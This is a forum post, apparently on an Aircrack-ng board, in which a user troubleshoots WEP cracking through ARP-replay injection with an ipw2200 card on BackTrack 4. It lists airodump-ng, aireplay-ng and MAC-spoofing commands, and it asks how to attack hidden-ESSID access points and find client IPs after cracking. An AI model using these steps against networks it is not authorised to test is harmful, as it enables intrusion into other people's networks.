hi, first tried this whole linux/aircrack yesterday and today now the whole day..,
got a little problem here getting the injection to work.
i am using backtrack latest (4) and i'll describe how far i've come:
00:00:00:00:00:00 = my original MAC
00:11:11:11:11:11 = BSSID of the AP to crack
00:22:22:22:22:22 = MAC of a client connected to the AP to crack
AP2crack = ESSID of the AP to crack
eth1 = my wireless adapter
[shell1]rmmod ipw2200
modprobe ipw2200 rtap_iface=1 channel=7
iwconfig eth1 ap 00:11:11:11:11:11 essid AP2crack channel 7 key s:fakekey mode managed
[shell2]airodump-ng --channel 7 --bssid 00:11:11:11:11:11 -w dump rtap0
[shell3]aireplay-ng --arpreplay -b 00:11:11:11:11:11 -e AP2crack -h 00:22:22:22:22:22 -i rtap0 eth1
[shell1]iwconfig eth1 ap 00:11:11:11:11:11 essid AP2crack channel 7 key s:fakekey mode managed
NOTES:- i am running the commands in exactly this order.
- EVERY time when i start aireplay [shell3] eth1 disconnects immediatly from the associated AP2crack and i have to run iwconfig again (while not stopping aireplay!), see the last shell1. then aireplay continues..
- i HAVE TO add ESSID to the iwconfig AND(!) the aireplay command. if these two dont match, aireplay ends with the error -> there is no matching BSSID!
- I HAVE TO add the CHANNEL OF THE AP2CRACK to the modprobe command [shell1], otherwise aireplay will quit with the error:
Waiting for beacon frame (BSSID: 00:11:11:11:11:11) on channel 0
rtap0 is on channel 0, but the AP uses channel 7- apart from that this error is persistant:
The interface MAC (00:00:00:00:00:00) doesn't match the specified MAC (-h).
ifconfig eth1 hw ether 00:22:22:22:22:22- i cannot change my MAC adress with
ifconfig eth1 hw ether 00:xx:xx:xx:xx:xx to match the MAC of the AP2crack client.
every time i do, its still the same error
interface MAC (00:00:00:00:00:00 still the original one) doesn't match..PROBLEM:1) aireplay is running, gathering packets, after some minutes getting some ACKs and some ARPs,
then injecting (up to >300 000), BUT airodump[shell2] is not increasing #data (just the 'normal' data increase once in a while from the client)! PWR ~-70 / RXQ ~ 70 .
why?
2) airodump via rtap0 is A LOT slower than via eth1, sometimes getting just 10 beacons a minute while airodump eth1 is running like hundreds of beacons a min.
also airodump rtap0 is (sometimes) getting beacons but not showing a single #data and not showing the STATIONS.
why?
3) question, can i have different rtaps so i can have one for every channel i need, so i dont have to always run rmmod ipw2200 and modprobe every time when attacking APs on different channels.like said aireplay is listening on chan 0 if i dont give rtap0 the right one for the AP.
4) or can i point aireplay to listen for beacons on the specific channel of the AP2crack so i dont have to change the rtapchannel every time?
5) if i have an AP without an ESSID (like <length 8>), how can i start an aireplay on that one, because like i said before, i have to enter both BSSID and ESSID for aireplay to work. i tried also giving it a dummy name (same iwconfig and aireplay) but didnt work (error:there is no matching essid).
6) how can i discover the ip of a connected STATION or the default ip of the AP? so i can set the ip when the cracked AP is not using dhcp.)
i am the whole day trying now to come this far
so i would appreciate pointing me in the right direction.
thx!
Aircrack-ng
Author
Logged
